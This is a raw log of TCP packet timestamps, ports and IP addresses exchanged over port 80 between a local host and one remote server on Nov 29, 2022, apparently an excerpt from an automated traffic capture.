                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616208076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616216898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616216898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616220951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616233110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616245985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616257906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616270065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616281986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616295099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616316080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616342068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616353035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616364002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616367102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616367102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616367102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616374969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616385937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616396904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616408110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616416931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616416931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616585970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616585970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.624561071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624754906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.624834061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624847889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624891996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624910116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624924898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624949932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624979019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624990940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625015974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625040054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625051975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625062943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625077963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625077963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625077963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625077963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625109911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625130892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625143051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625160933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625179052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625195980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625211000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625226021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625242949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625257969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625272989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625289917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625298977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625298977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625298977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625298977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625298977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625298977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625304937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625324011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625335932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625349045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625365019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625379086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625396013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625412941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625426054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625443935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625456095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625471115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625471115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625471115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625471115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625471115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625471115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625471115 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625475883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625494957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625514030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625531912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625543118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625638008 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625638008 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625804901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.625804901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.630374908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630613089 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.630639076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630651951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630666971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630678892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630690098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630702019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630714893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.630846977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.631068945 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634296894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634430885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634445906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634469986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634491920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634497881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634512901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634525061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634538889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634697914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634705067 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634705067 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634705067 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634705067 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634705067 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634705067 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634705067 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634720087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634749889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634777069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634788990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634814024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634826899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634839058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634865046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634872913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634872913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634872913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.634882927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634898901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634912968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634938002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634949923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634962082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634974003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634984970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.634996891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.635008097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.635049105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635049105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635049105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635049105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635049105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635049105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635078907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.635106087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.635117054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.635128975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.635140896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.635200977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635200977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635391951 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635392904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635392904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.635392904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647042990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647241116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647267103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647279978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647293091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647305012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647316933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647329092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647341013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647352934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647363901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647376060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647387981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647399902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647412062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647423983 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647460938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647460938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647460938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647511959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647511959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647511959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647511959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647511959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647511959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647511959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647631884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647644997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647656918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647667885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647677898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647681952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647696018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647707939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647718906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647732973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647758007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647769928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647783995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647795916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647809029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647820950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647833109 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647849083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647854090 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647854090 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647854090 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647854090 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647855043 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647855043 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647855043 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647855043 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.647861004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647872925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647886038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647897959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647910118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647922039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647934914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647947073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.647959948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.648021936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.648021936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.648021936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.648190975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.648190975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.648190975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.648190975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651200056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651279926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651331902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651345015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651356936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651370049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651382923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651386023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651395082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651406050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651417971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651428938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651441097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651452065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651463985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651475906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651488066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651499033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651510954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651521921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651534081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651545048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651556969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651557922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651557922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651557922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651557922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651557922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651568890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651580095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651592016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651602030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651612997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651624918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651637077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651648045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651659966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651671886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651684046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651695013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651706934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651719093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651726007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651730061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651740074 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651740074 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651740074 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651741982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651753902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651766062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651777029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.651897907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651897907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651897907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651897907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.651897907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.675527096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675549030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675596952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675612926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675627947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675645113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675662994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675679922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675694942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675710917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675729036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675743103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675760031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675776958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675795078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675807953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675820112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675837994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675851107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675868988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675877094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.675889015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675904036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675920963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675936937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675954103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675967932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675985098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676002026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676016092 CET8049852104.21.44.194192.168.11.20
